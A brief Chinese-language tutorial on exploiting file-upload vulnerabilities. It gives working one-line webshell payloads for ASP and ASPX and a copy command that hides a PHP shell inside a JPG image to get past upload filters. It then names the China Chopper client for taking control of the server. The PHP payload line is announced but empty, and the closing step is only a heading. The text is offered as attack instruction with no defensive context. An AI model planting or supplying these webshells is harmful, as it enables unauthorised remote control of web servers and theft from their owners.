概述
利用文件上传漏洞,往目录站点上传一句话木马(简称webshell),再使用中国菜刀chopper.exe,即可提取系统权限。
常见形式
php的一句话木马:
asp的一句话是: <%eval request ("pass")%>
aspx的一句话是: <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
图片木马
-
需要将上传文件的文件头伪装成图片,首先利用copy命令将一句话木马文件Hack.php与正常的图片文件1.jpg合并,生成带有木马的图片文件hack.jpg.
copy 1.jpg/b+Hack.php/a hack.jpg
【备注】在CMD下用copy命令制作“图片木马”的步骤,其中,1.jpg/b中“b”表示“二进制文件”,Hack.php/a中“a"表示ASCII码文件。 -
上传带木马的图片文件
3、使用中国菜刀